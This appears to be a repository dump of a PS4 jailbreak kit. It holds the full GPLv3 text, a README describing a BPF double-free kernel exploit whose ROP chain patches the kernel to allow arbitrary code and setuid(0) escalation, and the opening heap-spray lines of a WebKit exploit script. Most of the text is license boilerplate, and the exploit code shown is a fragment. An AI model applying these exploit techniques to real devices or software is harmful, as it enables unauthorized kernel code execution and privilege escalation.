├── LICENSE
├── QuickHEN
    ├── README.md
    ├── expl.js
    ├── fake_installer.bin
    ├── index.html
    ├── kdumper.bin
    ├── kernel.js
    ├── offline.manifest
    ├── ps4-hen-vtx-455.bin
    ├── ps4-hen-vtx-505.bin
    ├── rop.js
    ├── syscalls.js
    ├── unblocker.bin
    └── userland.js
├── README.md
└── shellcode_ps4_bpf_505_kexploit
    ├── shellcode2js
        ├── bin
        │   └── shellcode2js.exe
        └── src
        │   ├── Makefile
        │   └── main.c
    ├── shellcode_455.bin
    ├── shellcode_455.bin.js
    ├── shellcode_474.bin
    ├── shellcode_474.bin.js
    ├── shellcode_501.bin
    ├── shellcode_501.bin.js
    ├── shellcode_505.bin
    ├── shellcode_505.bin.js
    ├── shellcode_505.c
    └── shellcode_505.i64


/LICENSE:
--------------------------------------------------------------------------------
  1 |                     GNU GENERAL PUBLIC LICENSE
  2 |                        Version 3, 29 June 2007
  3 | 
  4 |  Copyright (C) 2007 Free Software Foundation, Inc. <https://fsf.org/>
  5 |  Everyone is permitted to copy and distribute verbatim copies
  6 |  of this license document, but changing it is not allowed.
  7 | 
  8 |                             Preamble
  9 | 
 10 |   The GNU General Public License is a free, copyleft license for
 11 | software and other kinds of works.
 12 | 
 13 |   The licenses for most software and other practical works are designed
 14 | to take away your freedom to share and change the works.  By contrast,
 15 | the GNU General Public License is intended to guarantee your freedom to
 16 | share and change all versions of a program--to make sure it remains free
 17 | software for all its users.  We, the Free Software Foundation, use the
 18 | GNU General Public License for most of our software; it applies also to
 19 | any other work released this way by its authors.  You can apply it to
 20 | your programs, too.
 21 | 
 22 |   When we speak of free software, we are referring to freedom, not
 23 | price.  Our General Public Licenses are designed to make sure that you
 24 | have the freedom to distribute copies of free software (and charge for
 25 | them if you wish), that you receive source code or can get it if you
 26 | want it, that you can change the software or use pieces of it in new
 27 | free programs, and that you know you can do these things.
 28 | 
 29 |   To protect your rights, we need to prevent others from denying you
 30 | these rights or asking you to surrender the rights.  Therefore, you have
 31 | certain responsibilities if you distribute copies of the software, or if
 32 | you modify it: responsibilities to respect the freedom of others.
 33 | 
 34 |   For example, if you distribute copies of such a program, whether
 35 | gratis or for a fee, you must pass on to the recipients the same
 36 | freedoms that you received.  You must make sure that they, too, receive
 37 | or can get the source code.  And you must show them these terms so they
 38 | know their rights.
 39 | 
 40 |   Developers that use the GNU GPL protect your rights with two steps:
 41 | (1) assert copyright on the software, and (2) offer you this License
 42 | giving you legal permission to copy, distribute and/or modify it.
 43 | 
 44 |   For the developers' and authors' protection, the GPL clearly explains
 45 | that there is no warranty for this free software.  For both users' and
 46 | authors' sake, the GPL requires that modified versions be marked as
 47 | changed, so that their problems will not be attributed erroneously to
 48 | authors of previous versions.
 49 | 
 50 |   Some devices are designed to deny users access to install or run
 51 | modified versions of the software inside them, although the manufacturer
 52 | can do so.  This is fundamentally incompatible with the aim of
 53 | protecting users' freedom to change the software.  The systematic
 54 | pattern of such abuse occurs in the area of products for individuals to
 55 | use, which is precisely where it is most unacceptable.  Therefore, we
 56 | have designed this version of the GPL to prohibit the practice for those
 57 | products.  If such problems arise substantially in other domains, we
 58 | stand ready to extend this provision to those domains in future versions
 59 | of the GPL, as needed to protect the freedom of users.
 60 | 
 61 |   Finally, every program is threatened constantly by software patents.
 62 | States should not allow patents to restrict development and use of
 63 | software on general-purpose computers, but in those that do, we wish to
 64 | avoid the special danger that patents applied to a free program could
 65 | make it effectively proprietary.  To prevent this, the GPL assures that
 66 | patents cannot be used to render the program non-free.
 67 | 
 68 |   The precise terms and conditions for copying, distribution and
 69 | modification follow.
 70 | 
 71 |                        TERMS AND CONDITIONS
 72 | 
 73 |   0. Definitions.
 74 | 
 75 |   "This License" refers to version 3 of the GNU General Public License.
 76 | 
 77 |   "Copyright" also means copyright-like laws that apply to other kinds of
 78 | works, such as semiconductor masks.
 79 | 
 80 |   "The Program" refers to any copyrightable work licensed under this
 81 | License.  Each licensee is addressed as "you".  "Licensees" and
 82 | "recipients" may be individuals or organizations.
 83 | 
 84 |   To "modify" a work means to copy from or adapt all or part of the work
 85 | in a fashion requiring copyright permission, other than the making of an
 86 | exact copy.  The resulting work is called a "modified version" of the
 87 | earlier work or a work "based on" the earlier work.
 88 | 
 89 |   A "covered work" means either the unmodified Program or a work based
 90 | on the Program.
 91 | 
 92 |   To "propagate" a work means to do anything with it that, without
 93 | permission, would make you directly or secondarily liable for
 94 | infringement under applicable copyright law, except executing it on a
 95 | computer or modifying a private copy.  Propagation includes copying,
 96 | distribution (with or without modification), making available to the
 97 | public, and in some countries other activities as well.
 98 | 
 99 |   To "convey" a work means any kind of propagation that enables other
100 | parties to make or receive copies.  Mere interaction with a user through
101 | a computer network, with no transfer of a copy, is not conveying.
102 | 
103 |   An interactive user interface displays "Appropriate Legal Notices"
104 | to the extent that it includes a convenient and prominently visible
105 | feature that (1) displays an appropriate copyright notice, and (2)
106 | tells the user that there is no warranty for the work (except to the
107 | extent that warranties are provided), that licensees may convey the
108 | work under this License, and how to view a copy of this License.  If
109 | the interface presents a list of user commands or options, such as a
110 | menu, a prominent item in the list meets this criterion.
111 | 
112 |   1. Source Code.
113 | 
114 |   The "source code" for a work means the preferred form of the work
115 | for making modifications to it.  "Object code" means any non-source
116 | form of a work.
117 | 
118 |   A "Standard Interface" means an interface that either is an official
119 | standard defined by a recognized standards body, or, in the case of
120 | interfaces specified for a particular programming language, one that
121 | is widely used among developers working in that language.
122 | 
123 |   The "System Libraries" of an executable work include anything, other
124 | than the work as a whole, that (a) is included in the normal form of
125 | packaging a Major Component, but which is not part of that Major
126 | Component, and (b) serves only to enable use of the work with that
127 | Major Component, or to implement a Standard Interface for which an
128 | implementation is available to the public in source code form.  A
129 | "Major Component", in this context, means a major essential component
130 | (kernel, window system, and so on) of the specific operating system
131 | (if any) on which the executable work runs, or a compiler used to
132 | produce the work, or an object code interpreter used to run it.
133 | 
134 |   The "Corresponding Source" for a work in object code form means all
135 | the source code needed to generate, install, and (for an executable
136 | work) run the object code and to modify the work, including scripts to
137 | control those activities.  However, it does not include the work's
138 | System Libraries, or general-purpose tools or generally available free
139 | programs which are used unmodified in performing those activities but
140 | which are not part of the work.  For example, Corresponding Source
141 | includes interface definition files associated with source files for
142 | the work, and the source code for shared libraries and dynamically
143 | linked subprograms that the work is specifically designed to require,
144 | such as by intimate data communication or control flow between those
145 | subprograms and other parts of the work.
146 | 
147 |   The Corresponding Source need not include anything that users
148 | can regenerate automatically from other parts of the Corresponding
149 | Source.
150 | 
151 |   The Corresponding Source for a work in source code form is that
152 | same work.
153 | 
154 |   2. Basic Permissions.
155 | 
156 |   All rights granted under this License are granted for the term of
157 | copyright on the Program, and are irrevocable provided the stated
158 | conditions are met.  This License explicitly affirms your unlimited
159 | permission to run the unmodified Program.  The output from running a
160 | covered work is covered by this License only if the output, given its
161 | content, constitutes a covered work.  This License acknowledges your
162 | rights of fair use or other equivalent, as provided by copyright law.
163 | 
164 |   You may make, run and propagate covered works that you do not
165 | convey, without conditions so long as your license otherwise remains
166 | in force.  You may convey covered works to others for the sole purpose
167 | of having them make modifications exclusively for you, or provide you
168 | with facilities for running those works, provided that you comply with
169 | the terms of this License in conveying all material for which you do
170 | not control copyright.  Those thus making or running the covered works
171 | for you must do so exclusively on your behalf, under your direction
172 | and control, on terms that prohibit them from making any copies of
173 | your copyrighted material outside their relationship with you.
174 | 
175 |   Conveying under any other circumstances is permitted solely under
176 | the conditions stated below.  Sublicensing is not allowed; section 10
177 | makes it unnecessary.
178 | 
179 |   3. Protecting Users' Legal Rights From Anti-Circumvention Law.
180 | 
181 |   No covered work shall be deemed part of an effective technological
182 | measure under any applicable law fulfilling obligations under article
183 | 11 of the WIPO copyright treaty adopted on 20 December 1996, or
184 | similar laws prohibiting or restricting circumvention of such
185 | measures.
186 | 
187 |   When you convey a covered work, you waive any legal power to forbid
188 | circumvention of technological measures to the extent such circumvention
189 | is effected by exercising rights under this License with respect to
190 | the covered work, and you disclaim any intention to limit operation or
191 | modification of the work as a means of enforcing, against the work's
192 | users, your or third parties' legal rights to forbid circumvention of
193 | technological measures.
194 | 
195 |   4. Conveying Verbatim Copies.
196 | 
197 |   You may convey verbatim copies of the Program's source code as you
198 | receive it, in any medium, provided that you conspicuously and
199 | appropriately publish on each copy an appropriate copyright notice;
200 | keep intact all notices stating that this License and any
201 | non-permissive terms added in accord with section 7 apply to the code;
202 | keep intact all notices of the absence of any warranty; and give all
203 | recipients a copy of this License along with the Program.
204 | 
205 |   You may charge any price or no price for each copy that you convey,
206 | and you may offer support or warranty protection for a fee.
207 | 
208 |   5. Conveying Modified Source Versions.
209 | 
210 |   You may convey a work based on the Program, or the modifications to
211 | produce it from the Program, in the form of source code under the
212 | terms of section 4, provided that you also meet all of these conditions:
213 | 
214 |     a) The work must carry prominent notices stating that you modified
215 |     it, and giving a relevant date.
216 | 
217 |     b) The work must carry prominent notices stating that it is
218 |     released under this License and any conditions added under section
219 |     7.  This requirement modifies the requirement in section 4 to
220 |     "keep intact all notices".
221 | 
222 |     c) You must license the entire work, as a whole, under this
223 |     License to anyone who comes into possession of a copy.  This
224 |     License will therefore apply, along with any applicable section 7
225 |     additional terms, to the whole of the work, and all its parts,
226 |     regardless of how they are packaged.  This License gives no
227 |     permission to license the work in any other way, but it does not
228 |     invalidate such permission if you have separately received it.
229 | 
230 |     d) If the work has interactive user interfaces, each must display
231 |     Appropriate Legal Notices; however, if the Program has interactive
232 |     interfaces that do not display Appropriate Legal Notices, your
233 |     work need not make them do so.
234 | 
235 |   A compilation of a covered work with other separate and independent
236 | works, which are not by their nature extensions of the covered work,
237 | and which are not combined with it such as to form a larger program,
238 | in or on a volume of a storage or distribution medium, is called an
239 | "aggregate" if the compilation and its resulting copyright are not
240 | used to limit the access or legal rights of the compilation's users
241 | beyond what the individual works permit.  Inclusion of a covered work
242 | in an aggregate does not cause this License to apply to the other
243 | parts of the aggregate.
244 | 
245 |   6. Conveying Non-Source Forms.
246 | 
247 |   You may convey a covered work in object code form under the terms
248 | of sections 4 and 5, provided that you also convey the
249 | machine-readable Corresponding Source under the terms of this License,
250 | in one of these ways:
251 | 
252 |     a) Convey the object code in, or embodied in, a physical product
253 |     (including a physical distribution medium), accompanied by the
254 |     Corresponding Source fixed on a durable physical medium
255 |     customarily used for software interchange.
256 | 
257 |     b) Convey the object code in, or embodied in, a physical product
258 |     (including a physical distribution medium), accompanied by a
259 |     written offer, valid for at least three years and valid for as
260 |     long as you offer spare parts or customer support for that product
261 |     model, to give anyone who possesses the object code either (1) a
262 |     copy of the Corresponding Source for all the software in the
263 |     product that is covered by this License, on a durable physical
264 |     medium customarily used for software interchange, for a price no
265 |     more than your reasonable cost of physically performing this
266 |     conveying of source, or (2) access to copy the
267 |     Corresponding Source from a network server at no charge.
268 | 
269 |     c) Convey individual copies of the object code with a copy of the
270 |     written offer to provide the Corresponding Source.  This
271 |     alternative is allowed only occasionally and noncommercially, and
272 |     only if you received the object code with such an offer, in accord
273 |     with subsection 6b.
274 | 
275 |     d) Convey the object code by offering access from a designated
276 |     place (gratis or for a charge), and offer equivalent access to the
277 |     Corresponding Source in the same way through the same place at no
278 |     further charge.  You need not require recipients to copy the
279 |     Corresponding Source along with the object code.  If the place to
280 |     copy the object code is a network server, the Corresponding Source
281 |     may be on a different server (operated by you or a third party)
282 |     that supports equivalent copying facilities, provided you maintain
283 |     clear directions next to the object code saying where to find the
284 |     Corresponding Source.  Regardless of what server hosts the
285 |     Corresponding Source, you remain obligated to ensure that it is
286 |     available for as long as needed to satisfy these requirements.
287 | 
288 |     e) Convey the object code using peer-to-peer transmission, provided
289 |     you inform other peers where the object code and Corresponding
290 |     Source of the work are being offered to the general public at no
291 |     charge under subsection 6d.
292 | 
293 |   A separable portion of the object code, whose source code is excluded
294 | from the Corresponding Source as a System Library, need not be
295 | included in conveying the object code work.
296 | 
297 |   A "User Product" is either (1) a "consumer product", which means any
298 | tangible personal property which is normally used for personal, family,
299 | or household purposes, or (2) anything designed or sold for incorporation
300 | into a dwelling.  In determining whether a product is a consumer product,
301 | doubtful cases shall be resolved in favor of coverage.  For a particular
302 | product received by a particular user, "normally used" refers to a
303 | typical or common use of that class of product, regardless of the status
304 | of the particular user or of the way in which the particular user
305 | actually uses, or expects or is expected to use, the product.  A product
306 | is a consumer product regardless of whether the product has substantial
307 | commercial, industrial or non-consumer uses, unless such uses represent
308 | the only significant mode of use of the product.
309 | 
310 |   "Installation Information" for a User Product means any methods,
311 | procedures, authorization keys, or other information required to install
312 | and execute modified versions of a covered work in that User Product from
313 | a modified version of its Corresponding Source.  The information must
314 | suffice to ensure that the continued functioning of the modified object
315 | code is in no case prevented or interfered with solely because
316 | modification has been made.
317 | 
318 |   If you convey an object code work under this section in, or with, or
319 | specifically for use in, a User Product, and the conveying occurs as
320 | part of a transaction in which the right of possession and use of the
321 | User Product is transferred to the recipient in perpetuity or for a
322 | fixed term (regardless of how the transaction is characterized), the
323 | Corresponding Source conveyed under this section must be accompanied
324 | by the Installation Information.  But this requirement does not apply
325 | if neither you nor any third party retains the ability to install
326 | modified object code on the User Product (for example, the work has
327 | been installed in ROM).
328 | 
329 |   The requirement to provide Installation Information does not include a
330 | requirement to continue to provide support service, warranty, or updates
331 | for a work that has been modified or installed by the recipient, or for
332 | the User Product in which it has been modified or installed.  Access to a
333 | network may be denied when the modification itself materially and
334 | adversely affects the operation of the network or violates the rules and
335 | protocols for communication across the network.
336 | 
337 |   Corresponding Source conveyed, and Installation Information provided,
338 | in accord with this section must be in a format that is publicly
339 | documented (and with an implementation available to the public in
340 | source code form), and must require no special password or key for
341 | unpacking, reading or copying.
342 | 
343 |   7. Additional Terms.
344 | 
345 |   "Additional permissions" are terms that supplement the terms of this
346 | License by making exceptions from one or more of its conditions.
347 | Additional permissions that are applicable to the entire Program shall
348 | be treated as though they were included in this License, to the extent
349 | that they are valid under applicable law.  If additional permissions
350 | apply only to part of the Program, that part may be used separately
351 | under those permissions, but the entire Program remains governed by
352 | this License without regard to the additional permissions.
353 | 
354 |   When you convey a copy of a covered work, you may at your option
355 | remove any additional permissions from that copy, or from any part of
356 | it.  (Additional permissions may be written to require their own
357 | removal in certain cases when you modify the work.)  You may place
358 | additional permissions on material, added by you to a covered work,
359 | for which you have or can give appropriate copyright permission.
360 | 
361 |   Notwithstanding any other provision of this License, for material you
362 | add to a covered work, you may (if authorized by the copyright holders of
363 | that material) supplement the terms of this License with terms:
364 | 
365 |     a) Disclaiming warranty or limiting liability differently from the
366 |     terms of sections 15 and 16 of this License; or
367 | 
368 |     b) Requiring preservation of specified reasonable legal notices or
369 |     author attributions in that material or in the Appropriate Legal
370 |     Notices displayed by works containing it; or
371 | 
372 |     c) Prohibiting misrepresentation of the origin of that material, or
373 |     requiring that modified versions of such material be marked in
374 |     reasonable ways as different from the original version; or
375 | 
376 |     d) Limiting the use for publicity purposes of names of licensors or
377 |     authors of the material; or
378 | 
379 |     e) Declining to grant rights under trademark law for use of some
380 |     trade names, trademarks, or service marks; or
381 | 
382 |     f) Requiring indemnification of licensors and authors of that
383 |     material by anyone who conveys the material (or modified versions of
384 |     it) with contractual assumptions of liability to the recipient, for
385 |     any liability that these contractual assumptions directly impose on
386 |     those licensors and authors.
387 | 
388 |   All other non-permissive additional terms are considered "further
389 | restrictions" within the meaning of section 10.  If the Program as you
390 | received it, or any part of it, contains a notice stating that it is
391 | governed by this License along with a term that is a further
392 | restriction, you may remove that term.  If a license document contains
393 | a further restriction but permits relicensing or conveying under this
394 | License, you may add to a covered work material governed by the terms
395 | of that license document, provided that the further restriction does
396 | not survive such relicensing or conveying.
397 | 
398 |   If you add terms to a covered work in accord with this section, you
399 | must place, in the relevant source files, a statement of the
400 | additional terms that apply to those files, or a notice indicating
401 | where to find the applicable terms.
402 | 
403 |   Additional terms, permissive or non-permissive, may be stated in the
404 | form of a separately written license, or stated as exceptions;
405 | the above requirements apply either way.
406 | 
407 |   8. Termination.
408 | 
409 |   You may not propagate or modify a covered work except as expressly
410 | provided under this License.  Any attempt otherwise to propagate or
411 | modify it is void, and will automatically terminate your rights under
412 | this License (including any patent licenses granted under the third
413 | paragraph of section 11).
414 | 
415 |   However, if you cease all violation of this License, then your
416 | license from a particular copyright holder is reinstated (a)
417 | provisionally, unless and until the copyright holder explicitly and
418 | finally terminates your license, and (b) permanently, if the copyright
419 | holder fails to notify you of the violation by some reasonable means
420 | prior to 60 days after the cessation.
421 | 
422 |   Moreover, your license from a particular copyright holder is
423 | reinstated permanently if the copyright holder notifies you of the
424 | violation by some reasonable means, this is the first time you have
425 | received notice of violation of this License (for any work) from that
426 | copyright holder, and you cure the violation prior to 30 days after
427 | your receipt of the notice.
428 | 
429 |   Termination of your rights under this section does not terminate the
430 | licenses of parties who have received copies or rights from you under
431 | this License.  If your rights have been terminated and not permanently
432 | reinstated, you do not qualify to receive new licenses for the same
433 | material under section 10.
434 | 
435 |   9. Acceptance Not Required for Having Copies.
436 | 
437 |   You are not required to accept this License in order to receive or
438 | run a copy of the Program.  Ancillary propagation of a covered work
439 | occurring solely as a consequence of using peer-to-peer transmission
440 | to receive a copy likewise does not require acceptance.  However,
441 | nothing other than this License grants you permission to propagate or
442 | modify any covered work.  These actions infringe copyright if you do
443 | not accept this License.  Therefore, by modifying or propagating a
444 | covered work, you indicate your acceptance of this License to do so.
445 | 
446 |   10. Automatic Licensing of Downstream Recipients.
447 | 
448 |   Each time you convey a covered work, the recipient automatically
449 | receives a license from the original licensors, to run, modify and
450 | propagate that work, subject to this License.  You are not responsible
451 | for enforcing compliance by third parties with this License.
452 | 
453 |   An "entity transaction" is a transaction transferring control of an
454 | organization, or substantially all assets of one, or subdividing an
455 | organization, or merging organizations.  If propagation of a covered
456 | work results from an entity transaction, each party to that
457 | transaction who receives a copy of the work also receives whatever
458 | licenses to the work the party's predecessor in interest had or could
459 | give under the previous paragraph, plus a right to possession of the
460 | Corresponding Source of the work from the predecessor in interest, if
461 | the predecessor has it or can get it with reasonable efforts.
462 | 
463 |   You may not impose any further restrictions on the exercise of the
464 | rights granted or affirmed under this License.  For example, you may
465 | not impose a license fee, royalty, or other charge for exercise of
466 | rights granted under this License, and you may not initiate litigation
467 | (including a cross-claim or counterclaim in a lawsuit) alleging that
468 | any patent claim is infringed by making, using, selling, offering for
469 | sale, or importing the Program or any portion of it.
470 | 
471 |   11. Patents.
472 | 
473 |   A "contributor" is a copyright holder who authorizes use under this
474 | License of the Program or a work on which the Program is based.  The
475 | work thus licensed is called the contributor's "contributor version".
476 | 
477 |   A contributor's "essential patent claims" are all patent claims
478 | owned or controlled by the contributor, whether already acquired or
479 | hereafter acquired, that would be infringed by some manner, permitted
480 | by this License, of making, using, or selling its contributor version,
481 | but do not include claims that would be infringed only as a
482 | consequence of further modification of the contributor version.  For
483 | purposes of this definition, "control" includes the right to grant
484 | patent sublicenses in a manner consistent with the requirements of
485 | this License.
486 | 
487 |   Each contributor grants you a non-exclusive, worldwide, royalty-free
488 | patent license under the contributor's essential patent claims, to
489 | make, use, sell, offer for sale, import and otherwise run, modify and
490 | propagate the contents of its contributor version.
491 | 
492 |   In the following three paragraphs, a "patent license" is any express
493 | agreement or commitment, however denominated, not to enforce a patent
494 | (such as an express permission to practice a patent or covenant not to
495 | sue for patent infringement).  To "grant" such a patent license to a
496 | party means to make such an agreement or commitment not to enforce a
497 | patent against the party.
498 | 
499 |   If you convey a covered work, knowingly relying on a patent license,
500 | and the Corresponding Source of the work is not available for anyone
501 | to copy, free of charge and under the terms of this License, through a
502 | publicly available network server or other readily accessible means,
503 | then you must either (1) cause the Corresponding Source to be so
504 | available, or (2) arrange to deprive yourself of the benefit of the
505 | patent license for this particular work, or (3) arrange, in a manner
506 | consistent with the requirements of this License, to extend the patent
507 | license to downstream recipients.  "Knowingly relying" means you have
508 | actual knowledge that, but for the patent license, your conveying the
509 | covered work in a country, or your recipient's use of the covered work
510 | in a country, would infringe one or more identifiable patents in that
511 | country that you have reason to believe are valid.
512 | 
513 |   If, pursuant to or in connection with a single transaction or
514 | arrangement, you convey, or propagate by procuring conveyance of, a
515 | covered work, and grant a patent license to some of the parties
516 | receiving the covered work authorizing them to use, propagate, modify
517 | or convey a specific copy of the covered work, then the patent license
518 | you grant is automatically extended to all recipients of the covered
519 | work and works based on it.
520 | 
521 |   A patent license is "discriminatory" if it does not include within
522 | the scope of its coverage, prohibits the exercise of, or is
523 | conditioned on the non-exercise of one or more of the rights that are
524 | specifically granted under this License.  You may not convey a covered
525 | work if you are a party to an arrangement with a third party that is
526 | in the business of distributing software, under which you make payment
527 | to the third party based on the extent of your activity of conveying
528 | the work, and under which the third party grants, to any of the
529 | parties who would receive the covered work from you, a discriminatory
530 | patent license (a) in connection with copies of the covered work
531 | conveyed by you (or copies made from those copies), or (b) primarily
532 | for and in connection with specific products or compilations that
533 | contain the covered work, unless you entered into that arrangement,
534 | or that patent license was granted, prior to 28 March 2007.
535 | 
536 |   Nothing in this License shall be construed as excluding or limiting
537 | any implied license or other defenses to infringement that may
538 | otherwise be available to you under applicable patent law.
539 | 
540 |   12. No Surrender of Others' Freedom.
541 | 
542 |   If conditions are imposed on you (whether by court order, agreement or
543 | otherwise) that contradict the conditions of this License, they do not
544 | excuse you from the conditions of this License.  If you cannot convey a
545 | covered work so as to satisfy simultaneously your obligations under this
546 | License and any other pertinent obligations, then as a consequence you may
547 | not convey it at all.  For example, if you agree to terms that obligate you
548 | to collect a royalty for further conveying from those to whom you convey
549 | the Program, the only way you could satisfy both those terms and this
550 | License would be to refrain entirely from conveying the Program.
551 | 
552 |   13. Use with the GNU Affero General Public License.
553 | 
554 |   Notwithstanding any other provision of this License, you have
555 | permission to link or combine any covered work with a work licensed
556 | under version 3 of the GNU Affero General Public License into a single
557 | combined work, and to convey the resulting work.  The terms of this
558 | License will continue to apply to the part which is the covered work,
559 | but the special requirements of the GNU Affero General Public License,
560 | section 13, concerning interaction through a network will apply to the
561 | combination as such.
562 | 
563 |   14. Revised Versions of this License.
564 | 
565 |   The Free Software Foundation may publish revised and/or new versions of
566 | the GNU General Public License from time to time.  Such new versions will
567 | be similar in spirit to the present version, but may differ in detail to
568 | address new problems or concerns.
569 | 
570 |   Each version is given a distinguishing version number.  If the
571 | Program specifies that a certain numbered version of the GNU General
572 | Public License "or any later version" applies to it, you have the
573 | option of following the terms and conditions either of that numbered
574 | version or of any later version published by the Free Software
575 | Foundation.  If the Program does not specify a version number of the
576 | GNU General Public License, you may choose any version ever published
577 | by the Free Software Foundation.
578 | 
579 |   If the Program specifies that a proxy can decide which future
580 | versions of the GNU General Public License can be used, that proxy's
581 | public statement of acceptance of a version permanently authorizes you
582 | to choose that version for the Program.
583 | 
584 |   Later license versions may give you additional or different
585 | permissions.  However, no additional obligations are imposed on any
586 | author or copyright holder as a result of your choosing to follow a
587 | later version.
588 | 
589 |   15. Disclaimer of Warranty.
590 | 
591 |   THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY
592 | APPLICABLE LAW.  EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT
593 | HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY
594 | OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO,
595 | THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
596 | PURPOSE.  THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM
597 | IS WITH YOU.  SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF
598 | ALL NECESSARY SERVICING, REPAIR OR CORRECTION.
599 | 
600 |   16. Limitation of Liability.
601 | 
602 |   IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
603 | WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS
604 | THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY
605 | GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE
606 | USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF
607 | DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD
608 | PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS),
609 | EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF
610 | SUCH DAMAGES.
611 | 
612 |   17. Interpretation of Sections 15 and 16.
613 | 
614 |   If the disclaimer of warranty and limitation of liability provided
615 | above cannot be given local legal effect according to their terms,
616 | reviewing courts shall apply local law that most closely approximates
617 | an absolute waiver of all civil liability in connection with the
618 | Program, unless a warranty or assumption of liability accompanies a
619 | copy of the Program in return for a fee.
620 | 
621 |                      END OF TERMS AND CONDITIONS
622 | 
623 |             How to Apply These Terms to Your New Programs
624 | 
625 |   If you develop a new program, and you want it to be of the greatest
626 | possible use to the public, the best way to achieve this is to make it
627 | free software which everyone can redistribute and change under these terms.
628 | 
629 |   To do so, attach the following notices to the program.  It is safest
630 | to attach them to the start of each source file to most effectively
631 | state the exclusion of warranty; and each file should have at least
632 | the "copyright" line and a pointer to where the full notice is found.
633 | 
634 |     <one line to give the program's name and a brief idea of what it does.>
635 |     Copyright (C) <year>  <name of author>
636 | 
637 |     This program is free software: you can redistribute it and/or modify
638 |     it under the terms of the GNU General Public License as published by
639 |     the Free Software Foundation, either version 3 of the License, or
640 |     (at your option) any later version.
641 | 
642 |     This program is distributed in the hope that it will be useful,
643 |     but WITHOUT ANY WARRANTY; without even the implied warranty of
644 |     MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
645 |     GNU General Public License for more details.
646 | 
647 |     You should have received a copy of the GNU General Public License
648 |     along with this program.  If not, see <https://www.gnu.org/licenses/>.
649 | 
650 | Also add information on how to contact you by electronic and paper mail.
651 | 
652 |   If the program does terminal interaction, make it output a short
653 | notice like this when it starts in an interactive mode:
654 | 
655 |     <program>  Copyright (C) <year>  <name of author>
656 |     This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'.
657 |     This is free software, and you are welcome to redistribute it
658 |     under certain conditions; type `show c' for details.
659 | 
660 | The hypothetical commands `show w' and `show c' should show the appropriate
661 | parts of the General Public License.  Of course, your program's commands
662 | might be different; for a GUI interface, you would use an "about box".
663 | 
664 |   You should also get your employer (if you work as a programmer) or school,
665 | if any, to sign a "copyright disclaimer" for the program, if necessary.
666 | For more information on this, and how to apply and follow the GNU GPL, see
667 | <https://www.gnu.org/licenses/>.
668 | 
669 |   The GNU General Public License does not permit incorporating your program
670 | into proprietary programs.  If your program is a subroutine library, you
671 | may consider it more useful to permit linking proprietary applications with
672 | the library.  If this is what you want to do, use the GNU Lesser General
673 | Public License instead of this License.  But first, please read
674 | <https://www.gnu.org/licenses/why-not-lgpl.html>.
675 | 


--------------------------------------------------------------------------------
/QuickHEN/README.md:
--------------------------------------------------------------------------------
 1 | # PS4 4.55-5.07 Kernel Exploit
 2 | ---
 3 | ## Summary
 4 | In this project you will find a full implementation of the second "bpf" kernel exploit for the PlayStation 4 on <=5.07.
 5 | It will allow you to run arbitrary code as kernel, to allow jailbreaking and kernel-level modifications to the system.
 6 | 
 7 | ## Exploits
 8 | - webkit: 
 9 | - kernel: BPF Double Free exploit by qwertyoruiopz
10 | 
11 | ## Patches included
12 | The following patches are applied in the kernel ROP chain:
13 | 1) Disable kernel write protection
14 | 2) Allow RWX (read-write-execute) memory mapping
15 | 3) Syscall instruction allowed anywhere
16 | 4) Dynamic Resolving (`sys_dynlib_dlsym`) allowed from any process
17 | 4) Custom system call #11 (`kexec()`) to execute arbitrary code in kernel mode
18 | 5) Allow unprivileged users to call `setuid(0)` successfully. Works as a status check, and doubles as a privilege escalation.
19 | 
20 | ## Payloads included
21 | 1) PS4HEN (Homebrew ENabler): default
22 | 2) Mira: removed
23 | 3) Kdumper: optional
24 | 4) Update unblocker: optional
25 | 
26 | ## Notes
27 | 
28 | 
29 | ## Contributors
30 | Massive credits to the following:
31 | 
32 | - [qwertyoruiopz](https://twitter.com/qwertyoruiopz)
33 | - [Cryptogenic](https://twitter.com/SpecterDev) aka Specter
34 | - [Flatz](https://twitter.com/flat_z)
35 | - [CelesteBlue-dev](https://twitter.com/CelesteBlue123)
36 | - [Vortex](https://github.com/xvortex)
37 | - to be continued
38 | - [OpenOrbis Team](https://github.com/OpenOrbis/)
39 | - Anonymous
40 | 


--------------------------------------------------------------------------------
/QuickHEN/expl.js:
--------------------------------------------------------------------------------
  1 | function makeid() {
  2 |     var text = "";
  3 |     var possible = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
  4 | 
  5 |     for (var i = 0; i < 8; i++)
  6 |         text += possible.charAt(Math.floor(Math.random() * possible.length));
  7 | 
  8 |     return text;
  9 | };
 10 | 
 11 | var instancespr = [];
 12 | 
 13 | for (var i = 0; i < 4096; i++) {
 14 |     instancespr[i] = new Uint32Array(1);
 15 |     instancespr[i][makeid()] = 50057; /* spray 4-field Object InstanceIDs */
 16 | }
 17 | 
 18 | var _dview;
 19 | 
 20 | function u2d(low, hi) {
 21 |     if (!_dview) _dview = new DataView(new ArrayBuffer(16));
 22 |     _dview.setUint32(0, hi);
 23 |     _dview.setUint32(4, low);
 24 |     return _dview.getFloat64(0);
 25 | }
 26 | var dgc = function () {
 27 |     for (var i = 0; i < 0x100; i++) {
 28 |         new ArrayBuffer(0x100000);
 29 |     }
 30 | }
 31 | 
